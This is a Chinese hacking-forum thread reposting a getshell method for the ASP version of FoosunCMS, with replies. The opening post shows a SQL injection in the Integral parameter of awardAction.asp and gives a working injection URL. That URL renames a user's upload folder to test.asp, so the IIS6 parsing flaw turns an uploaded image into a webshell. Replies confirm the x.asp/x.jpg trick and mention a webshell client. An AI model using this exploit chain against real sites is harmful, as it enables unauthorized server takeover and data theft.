查看: 15885|回复: 9

风讯Cms的asp版本getshell

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2013-12-28 10:20:59 | 显示全部楼层 |阅读模式
    在文件\User\award\awardAction.asp中:
    [AppleScript] 纯文本查看 复制代码
    Integral=NoSqlHack(request.QueryString("Integral"))
     
    if action="join" then
     
    User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
     
    '获得当前参加人数--------------------------------
     
    User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")
    

    请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息

    3.jpg
    webshell还可以用来代替access

    我们文件管理中上传个图片文件:

    http://192.168.1.101/UserFiles/2 ... 7_01_10_0390446.jpg

    UserNumber就是等于27015564I69

    通过以上的sql注入漏洞,直接update为test.asp

    http://192.168.1.101/User/award/ ... ID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1
    2 (1).jpg
    退出再重新登录
    11 (1).jpg
    生成test.asp目录,后续上传的文件都会保存在该文件中

    利用iis解析漏洞获取webshell
    4.jpg

    转自0day5

    评分

    参与人数 1i币 +10 收起 理由
    90_ + 10 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2021-11-3 17:36
  • 签到天数: 87 天

    [LV.6]常住居民II

    发表于 2013-12-28 11:59:32 | 显示全部楼层
    能否 告知现在  4.0 sp7 怎么后台拿shell么?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2020-4-29 10:22
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2013-12-28 13:58:12 | 显示全部楼层
    膜拜审计大牛
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-6-8 19:18
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-12-28 14:24:22 | 显示全部楼层
    这个没太看懂

    点评

    利用iis解析漏洞getshell  详情 回复 发表于 2013-12-28 15:09
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

     楼主| 发表于 2013-12-28 15:09:18 | 显示全部楼层
    悲伤 发表于 2013-12-28 14:24
    这个没太看懂

    利用iis解析漏洞getshell

    点评

    X.asp/X.jpg??  详情 回复 发表于 2013-12-28 16:19
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-6-8 19:18
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-12-28 16:19:17 | 显示全部楼层
    C4r1st 发表于 2013-12-28 15:09
    利用iis解析漏洞getshell

    X.asp/X.jpg??

    点评

    是的。很对。  详情 回复 发表于 2013-12-28 17:52
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

     楼主| 发表于 2013-12-28 17:52:25 | 显示全部楼层
    悲伤 发表于 2013-12-28 16:19
    X.asp/X.jpg??

    是的。很对。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-1-1 21:16
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2013-12-29 09:28:07 | 显示全部楼层
    对于iis7.5环境有什么办法么?

    点评

    iis6才有解析漏洞额~  详情 回复 发表于 2013-12-29 09:45
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

     楼主| 发表于 2013-12-29 09:45:38 | 显示全部楼层
    启帆 发表于 2013-12-29 09:28
    对于iis7.5环境有什么办法么?

    iis6才有解析漏洞额~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2016-10-20 11:18
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2014-1-6 21:17:18 | 显示全部楼层
    这个我知道 登录后台新建目录就行 也是这个原理解析为xx.asp;xx.jpg 菜刀链接 就o        k
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-5-18 20:45 , Processed in 0.022437 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部